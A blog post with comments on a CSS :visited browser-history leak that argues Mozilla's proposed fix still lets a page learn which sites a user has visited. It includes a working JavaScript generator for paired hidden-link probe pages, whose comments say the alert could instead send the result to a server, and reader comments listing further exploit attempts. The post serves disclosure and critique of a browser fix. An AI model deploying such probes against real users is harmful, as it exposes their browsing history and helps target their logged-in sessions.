Firefox security case study: Mozilla's CSS :visited solution is still vulnerable

By William Entriken


JavaScript running in browsers that implement today's W3C standards can let the current page discover which URLs the user has previously visited (the CSS :visited history leak). That is very useful reconnaissance for an XSS or similar cross-site attack that needs to know whether the user has already authenticated to a login system, for example an attack that trades stocks from other people's investment accounts using their live session.

Since this information is so useful to an attacker, Mozilla is preparing to break compliance with the relevant APIs to close this vector: getComputedStyle and similar calls will report the unvisited style, and :visited will be limited to colour changes.

The details are in Mozilla's privacy CSS blog post.

But this issue is too big to settle for a "solution" that breaks the API, does so ungracefully, and still does not solve the problem. Here is a demonstration that will keep working if Mozilla goes through with this cowboy (read: Microsoft) attitude to web standards. Each line below contains two "here" links pointing at the same URL; :visited styling paints one of them in the page background colour, so the user only ever sees one, and which one they click reveals the bit. The first pair tells you whether you have visited purple.com before and the second whether you have logged in to Zecco.com:

Click for free wallpapers  here (you didn't visit purple.com before)
Click for free wallpapers  here (you visited purple.com before)
Click for free wallpapers  here (you didn't visit zecco.com before)
Click for free wallpapers  here (you visited zecco.com before)

You could probably do a better job than I did of styling these elements, but either way the attack vector still exists: the demo only changes the color property, which is exactly what Mozilla's proposal still allows :visited to do.
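The paired-link probe described above, written out as a generator, as an added example that is not the post's own demo code. It assumes Mozilla's proposed behaviour (:visited may still change color but keeps the unvisited alpha, so the hidden link is painted in the background colour rather than made transparent). The target URLs, bait text and the example.com post-login URL are constructed assumptions, not values from the page; the purple.com probe mirrors the first pair above.

```javascript
// Added example (not the post's own code): generator for the two-anchor
// :visited probe. Node builds the HTML; open the output in a browser to try it.

const PAGE_BG = "#ffffff"; // page background colour
const LINK_FG = "#0000ee"; // colour of the one link the user can actually see

// Each probe is two anchors with the SAME href. "probe-a" is legible only while
// the URL is not in history, "probe-b" only once it is, so exactly one "here"
// is visible and whichever one the user clicks leaks the visited bit. Only the
// `color` property is used, which the proposed Mozilla rules still allow.
const PROBE_CSS = [
  `body { background: ${PAGE_BG}; }`,
  `a.probe-a { color: ${LINK_FG}; }`,
  `a.probe-a:visited { color: ${PAGE_BG}; }`,
  `a.probe-b { color: ${PAGE_BG}; }`,
  `a.probe-b:visited { color: ${LINK_FG}; }`,
].join("\n");

// Interpretation of a click report (usable in the page or on a beacon server).
function classifyClick(cls) {
  if (cls === "probe-b") return "visited";
  if (cls === "probe-a") return "not visited";
  throw new Error("unknown probe class: " + cls);
}

// Click handler that runs in the victim's browser. `alert` stands in for what
// an attacker would do: send the bit to a server, or act on the session.
function probeClicked(a, ev) {
  ev.preventDefault();
  alert(a.dataset.target + ": " + classifyClick(a.className));
}

// Both functions are inlined verbatim into the generated page.
const PROBE_JS = classifyClick.toString() + "\n" + probeClicked.toString();

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// One bait sentence followed by the two same-href anchors.
function probeMarkup(target) {
  const href = escapeHtml(target.url);
  const name = escapeHtml(target.name);
  const anchors = ["probe-a", "probe-b"]
    .map((cls) => `<a class="${cls}" href="${href}" data-target="${name}" onclick="probeClicked(this, event)">here</a>`)
    .join(" ");
  return `<p>${escapeHtml(target.bait)} ${anchors}</p>`;
}

function buildProbePage(targets) {
  return [
    "<!doctype html>",
    '<html><head><meta charset="utf-8">',
    `<style>\n${PROBE_CSS}\n</style>`,
    `<script>\n${PROBE_JS}\n</script>`,
    "</head><body>",
    ...targets.map(probeMarkup),
    "</body></html>",
  ].join("\n");
}

// Constructed sample targets. The href must match the history entry exactly
// (scheme, host, path), otherwise :visited never applies.
const SAMPLE_TARGETS = [
  { name: "purple.com", url: "http://purple.com/", bait: "Click for free wallpapers" },
  // Hypothetical post-login URL: it is only in history if the user logged in.
  { name: "example.com account", url: "https://example.com/account/overview", bait: "Click for free wallpapers" },
];

if (typeof window === "undefined") {
  console.log(buildProbePage(SAMPLE_TARGETS)); // Node: emit the probe page
}
```

Each pair yields one bit per user click, so this does not scale to bulk history scanning, and it only fires if the anchor's URL is byte-for-byte what the browser stored (a missing trailing slash or http versus https defeats it). The generated page uses nothing that Mozilla's proposal removes.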

Comments

Is there any way to exploit this directly? I tried to post your blog link on Hacker News (read) but it seems people mostly ignored it. Mr Baron and Mozilla's team should be informed.

Alberto Armandi

This is totally crazy.

Anonymous

Honestly, after 1 day of coding, hacking and researching I haven't found a viable way to exploit the vulnerability you mention here.

Alberto Armandi

Hello Alberto, thanks for the info and links. I have updated this blog page, which contains two active exploits. The second one shows how to apply this to sensitive financial transactions. I will not provide the code, but the JavaScript alert could be replaced with code that causes the user to send information to a server, or does something nasty based on the fact that it is known the user has logged in to a given website and has the session cookies necessary to make transactions. DISCLAIMER: NOTHING IN THIS POST OR COMMENT DEMONSTRATES A VULNERABILITY, WORKAROUND, OR PLANNED FEATURE UPGRADE OF ZECCO.COM. INSTEAD THIS SHOWS A PROBLEM WITH THE CURRENT W3C WEB STANDARDS AND MOZILLA'S PROPOSED IMPLEMENTATION.

William Entriken

I have just purchased the domain getComputedStyle.com and I intend to publicly release a JavaScript exploit that is based on the technique you show here to motivate Mr. Baron and the others to switch the API back to the normal behavior. Most of my web apps are breaking because they are based on getComputedStyle, but not for malicious purposes. None of the techniques I have tried until now have worked. What I have tried so far is:

1) Getting the element offsetHeight after it changed color. Not exploitable, returns always the same value for both kinds of links.
2) Changing your crafted CSS, adding special positioning rules and trying to get the position of the box on the screen by getting its coordinates does not work either.
3) The old-fashioned approach, setting a background url('bg.jpg'), works erratically and only if the file pointed to is an image and not a PHP script or the like.
4) I am now trying to hook the DOMAttrModified event to see if I can detect the color change, but I doubt it is going to work because normally it is a script that fires a change in color. In this case it is directly the CSS trick.

I would love to know your thoughts about the matter. Best Regards

Alberto Armandi

Hello Alberto, are you referring to the enso-now site? How are you using the getComputedStyle? All of the tricks you describe are implementation dependent and should not work. If they do work, that is a bug in Mozilla from following their own specification and it will be fixed. The web-designer will be prevented from making good use of getComputedStyle. Their motivation was to make the web safer. What I am demonstrating is that regardless of Mozilla's changes, which only affect legitimate designers like yourself, there will always be a way to use :visited for nefarious purposes.

William Entriken

This doesn't work for me as the "here" on the page is duplicated. You should fix this. I'm on Firefox, by the way.

Anonymous

Yes, there are two "here"s. But one has no instruction in front of it, so no one will click on it.

William Entriken

OK, it's a social engineering attack based on getting people to follow a link based on hiding visited links selectively using color. The exposure here is a tiny tiny fraction of the exposure using getComputedStyle. You can't check 20,000 links in a page this way. This is like trying to break people's passwords by trying to log on to the site, instead of downloading the hashed password file and feeding it to rainbow tables. It's just not a practical attack vector for most of the problem space.

Resuna

@Resuna good analysis, I'm changing my stance on this

William Entriken

I am really not sure what's supposed to happen here. I click the first link and nothing happens (why does nothing happen?). I press the second one and I get the alert. But I actually never visited either of the pages before.

Anonymous

Sorry, this is not clear. Please only click the link next to "Click here for free wallpapers" and ignore the other link. I have fixed the JavaScript on the first link. Thanks.

William Entriken

thank you! this helped me lots.

ovi


Please discuss this topic anywhere and let me know of any great comments or media coverage I should link here.